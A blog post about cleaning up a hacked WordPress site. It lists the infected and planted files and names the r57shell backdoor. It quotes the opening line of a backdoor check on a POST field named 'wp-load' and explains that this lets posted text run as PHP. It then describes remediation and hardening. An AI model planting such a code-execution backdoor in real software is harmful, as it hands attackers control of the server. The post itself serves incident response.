Malware and Restoring WordPress Security

Lately I had an occasion to work on restoring a WordPress website from a malicious attack. I must admit I had never before had any issues with security, so this was a completely new experience.

A website of a client’s client was one day blocked by Google – the searches would view a message about the website being malicious rather than the usual site description – as well as some web browsers, like Firefox and Chrome. At first we got a bit irritated thinking it was caused by a slightly outdated version of WordPress or some plugin. After a bit of investigation, using Google’s Webmasters Tools, we found out that some of the pages had code injected that would immediately redirect visitors to a truly suspicious website.

Google was forgiven within an instance and a swift recovery operation started. First, WordPress and all plugins were updated to the latest versions. That was pretty crucial, because if any of the WP files had been meddled with they were quickly and easily restored to their correct versions. But, of course, there are lots of other files that are not a part of the WP core.

It took several hours, but it would seem I managed to find all infected files and removed them. The attacker(s) were very tricky planting files with names very similar to the core WP files. As an example, WP comes with wp-app.php file, but I found wp-apps.php, which just at a brief look didn’t look suspicious. But here is where updating WP came in handy. It made it easier to spot suspicious files because they had a different modification date. On opening such a file all doubts were gone, because the contents definitely didn’t look like anything WordPress-y. The arrogant attackers even had the nerve to include the following comment at the top of the files:

/* This file is protected by copyright law and provided under license. Reverse engineering of this file is strictly prohibited. */

Quite cheeky that!

So, here is a list of all files that I found, that were either infected (marked with INF; some malicious code was added to them) or planted (marked with PLA; a completely new files were added on the server).

  • wp-content
    • plugins
      • all-in-one-favicon/includes/settings-page/sp-footer.php – INF
    • themes
      • twentyeleven
        • footer.php – INF
        • sidebar-footer.php – INF
  • wp-includes
    • js
      • js – PLA
        • cnn.php – PLA
        • rconfig.php – PLA
        • wp-load.php – PLA
    • wp-var.php – PLA
  • wp-apps.php – PLA
  • wp-count.php – PLA
  • wp-register.php – INF

You will notice that a file was infected in the All In One Favicon plugin. However, I do not think or even suspect, that the plugin creators had anything to do with the infection!

So, what was the infectious code? Mostly, it was just two lines of code, but very tricky! Take a look at the following PHP code:

if (isset($_POST['wp-load'])) {

It basically allows to run any text posted from a form as PHP code. Of course attacker wouldn’t be writing any text, it would be some malicious code which would then be executed.

Further investigation revealed the site was a victim to the notorious r57shell backdoor. Just google it and you’ll see ;)

So, what other steps did we take? Beside updating WordPress and the plugins and removing all malicious code, we also changed ALL passwords: users, admins, ftp, database. We also followed this WP FAQ and this tutorial on Hardenning WordPress and another one. Implementing all the advice included in these tutorials was followed by signing up with Sucuri.

Also worth mentioning is the fact that the site was un-blocked by Google at al. after less than 24 h since we had requested a review. That was very quick! Now we can hopefully go back to the much more enjoyable coding! :)